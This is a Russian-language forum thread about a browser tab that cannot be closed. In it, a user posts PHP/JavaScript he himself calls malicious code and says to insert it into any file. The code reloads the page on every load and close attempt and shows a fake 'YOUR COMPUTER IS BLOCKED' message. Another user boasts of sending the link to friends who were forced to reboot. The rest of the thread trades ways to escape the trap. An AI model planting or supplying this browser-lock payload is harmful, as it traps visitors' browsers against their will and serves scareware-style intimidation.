Незакрываемая вкладка

1.28K
.
на маём Макстоне линукс, закрыл "Быстро тыкаем enter и по крестику закрытия окна))" но не с первой попытке
.
ValekS
Ей 25
Зловредный код для пхп(по просьбе нуждающихся), можно в Джон всунуть...
echo '<script type="text/javascript">
onbeforeunload=function(){
location.reload();
return "ВАШ КОМПЬЮТЕР ЗАБЛОКИРОВАН ...";
};
onload=function(){
location.reload();
}


или

?>
<script type="text/javascript">
onbeforeunload=function(){
location.reload();
return "ВАШ КОМПЬЮТЕР ЗАБЛОКИРОВАН ...";
};
onload=function(){
location.reload();
}
</script>
<?php


Вставлять в любой файл, в любое место.
.
Ей 25
# ReaLs (24.11.2014 / 17:53)
на маём Макстоне линукс, закрыл "Быстро тыкаем enter и по крестику закрытия окна))" но не с первой попытке
Ещё вариант - отключить интернет, обновить страницу - выдаст ошибку "Нет сети" - и просто закрыть вкладку.
.
Сексуальность валенка
Ща тоже друзям разослал ссылку все пк перезагружали, но после перезагрузки и захода в хром вкладка так и осталась и пришлось заново перезагружать, некоторые досихпор не могут избавиться
.
Ей 25
# Swank (24.11.2014 / 23:25)
Ща тоже друзям разослал ссылку все пк перезагружали, но после перезагрузки и захода в хром вкладка так и осталась и пришлось заново перезагружать, некоторые досихпор не могут избавиться
Я одному написал - выкинь комп в окно, он говорит - лучше пойду отнесу пусть мне Винду поменяют)) Гг
.
The Frontend-Warrior
всего-то нужно js отключить
.
Think different
Лиса норм закрывает все...
.
Ей 25
# Blade (25.11.2014 / 00:01)
всего-то нужно js отключить
Мы обсуждаем при открытой уже вкладке что делать. А не перед... Ты ж не знаеш что там по идее, когда открываешь...
.
The Frontend-Warrior
ValekS, а что мешает отключить js при открытой вкладке и обновить страницу?
.
ValekS
Ей 25
# Blade (25.11.2014 / 00:28)
ValekS, а что мешает отключить js при открытой вкладке и обновить страницу?
Не знаю с чего ты там сидишь и как отключать собрался... У меня весь браузер блокируется и я ничего сделать немогу. Только быстрые сочетания клавиш тыкать можно и то в момент перезагрузки страницы.
Всего: 29